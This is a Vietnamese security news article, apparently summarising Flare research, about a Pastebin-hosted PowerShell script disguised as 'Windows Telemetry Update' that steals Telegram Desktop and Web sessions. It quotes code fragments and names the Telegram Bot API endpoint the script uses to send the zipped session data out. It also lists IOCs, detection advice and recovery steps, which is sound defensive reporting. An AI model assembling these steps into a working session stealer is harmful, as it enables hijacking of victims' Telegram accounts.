Tin tức bảo mật mới nhất cho thấy một script PowerShell được lưu trữ trên Pastebin đang được dùng để đánh cắp Telegram session từ cả client desktop và web. Script này được ngụy trang như một bản cập nhật hệ thống Windows, khiến người dùng dễ vô tình thực thi và tạo ra rủi ro bảo mật trực tiếp cho tài khoản Telegram.
PowerShell Script Trên Pastebin Và Mục Tiêu Telegram Session
Mã độc được đặt tên là “Windows Telemetry Update”, mô phỏng kiểu đặt tên của các tác vụ bảo trì Windows hợp lệ. Khi chạy, script ngay lập tức thu thập metadata máy nạn nhân như tên người dùng, tên máy và địa chỉ IP công cộng thông qua api.ipify.org.
Đây là một chuỗi tấn công đơn giản nhưng hiệu quả: kẻ vận hành không cần cơ chế khai thác phức tạp, chỉ cần khiến nạn nhân chạy file PowerShell. Với cách tiếp cận này, mối đe dọa mạng nằm ở việc đánh cắp phiên đăng nhập thay vì phá hoại hệ thống.
Hành vi thu thập và đóng gói dữ liệu
Script nhắm tới các thư mục Telegram Desktop và Telegram Desktop Beta dưới %APPDATA%\Telegram Desktop và %APPDATA%\Telegram Desktop Beta. Nếu tìm thấy session files, nó sẽ nén chúng thành file diag.zip trong thư mục TEMP của người dùng.
Trước khi nén, script buộc dừng tiến trình Telegram để giải phóng file lock trên thư mục tdata. Nó chờ thêm khoảng 2 giây rồi mới gọi lệnh Compress-Archive, cho thấy tác giả đã lưu ý đến cơ chế khóa tệp của Telegram Desktop.
Compress-Archive -Path $paths -DestinationPath $env:TEMP\diag.zipLỗ Hổng CVE Trong Ngữ Cảnh Mối Đe Dọa Này
Vụ việc này không gắn với một lỗ hổng CVE cụ thể. Đây là một lỗ hổng zero-day theo nghĩa kỹ thuật không phải là khai thác lỗi phần mềm, mà là lạm dụng quy trình người dùng và phiên đăng nhập hợp lệ. Do đó, trọng tâm của cảnh báo CVE ở đây không nằm ở bản vá ứng dụng, mà ở việc kiểm soát thực thi PowerShell và giám sát hành vi bất thường.
Tham chiếu kỹ thuật bổ sung có thể xem trên Flare Research: https://flare.io/learn/resources/blog/telegram-session-stealer-pastebin-hosted-powershell-script-targets-desktop-web-sessions
Cơ Chế Exfiltration Qua Telegram Bot API
Sau khi đóng gói xong, script gọi endpoint api.telegram.org/bot{token}/sendDocument với chat ID của kẻ vận hành, kèm metadata nạn nhân dưới dạng caption và file diag.zip như tài liệu đính kèm. Nếu cách này thất bại, nó chuyển sang dùng WebClient UploadFile để đảm bảo dữ liệu vẫn được gửi đi, dù không còn caption.
Ở mức web, thành phần stealer khác ghi nhận trạng thái session trong localStorage của Telegram Web, đặc biệt là các khóa dcX_auth_key và cấu trúc phiên account1. Các khóa này đủ để tái tạo phiên đã xác thực mà không cần mật khẩu hay OTP sau bước khởi tạo ban đầu.
api.telegram.org/bot{token}/sendDocumentHai biến thể và quá trình sửa lỗi
Script được phát hiện ở 2 phiên bản trên Pastebin, đều đăng dưới cùng một tài khoản. Phiên bản đầu tiên có triển khai upload multipart bị lỗi, khiến file diag.zip không thể tới bot.
Phiên bản sau đã sửa bằng cách triển khai đúng Invoke-RestMethod-Form với multipart/form-data chuẩn. Đây là chi tiết quan trọng vì cho thấy chuỗi phát triển công cụ vẫn đang được kiểm thử trước khi triển khai thực tế.
Invoke-RestMethod -Form $formData -Uri $uri -Method PostChỉ Số Đánh Giá Và Tác Động Hệ Thống
Nhóm nghiên cứu xếp hoạt động này ở mức high-severity threat do khả năng đánh cắp session Telegram và exfiltrate dữ liệu qua bot API. Mức độ ảnh hưởng chính là hệ thống bị xâm nhập theo nghĩa phiên ứng dụng bị chiếm quyền, không phải chiếm quyền root hay cài persistence trên máy.
Script không có obfuscation, không có cơ chế persistence, và cũng không có delivery chain tự động. Điều này cho thấy nó vẫn ở trạng thái active validation, nhưng biến thể hoạt động được và hạ tầng bot dùng chung cho thấy khả năng đã vượt qua giai đoạn thử nghiệm chức năng.
IOC Cần Ghi Nhận
- Pastebin-hosted PowerShell script với tên hiển thị “Windows Telemetry Update”
- File đầu ra: diag.zip
- Thư mục mục tiêu: %APPDATA%\Telegram Desktop
- Thư mục mục tiêu: %APPDATA%\Telegram Desktop Beta
- Miền liên quan: api.ipify.org
- Miền exfiltration: api.telegram.org
- Miền web: web.telegram.org
- Trường dữ liệu Telegram Web: dcX_auth_key, account1
Phát Hiện Xâm Nhập Và Giám Sát
Ở môi trường cho phép Telegram, cần theo dõi các lời gọi sendDocument và sendMessage phát sinh từ môi trường script như PowerShell, Python hoặc curl. Các hành vi này hiếm gặp trong ngữ cảnh doanh nghiệp và nên được ưu tiên triage.
Nếu Telegram không được phép, cần chặn ở lớp proxy và firewall các miền api.telegram.org và web.telegram.org. Với máy trạm nghi ngờ đã thực thi script, cần cô lập phiên Telegram đang hoạt động và kiểm tra dấu hiệu rò rỉ dữ liệu nhạy cảm.
Lệnh và thao tác khuyến nghị
Terminate All Other Sessions
Change password
Enable two-factor authenticationTrong Telegram, vào Settings → Privacy and Security → Active Sessions, sau đó chọn Terminate All Other Sessions. Tiếp theo, đổi mật khẩu và bật 2FA nếu chưa kích hoạt.
Vì session đã bị lộ có thể cho phép truy cập không cần mật khẩu, cần giả định rằng mọi nội dung đã trao đổi qua Telegram có thể đã trở thành thông tin rò rỉ và xử lý theo quy trình bảo vệ tài khoản liên quan.
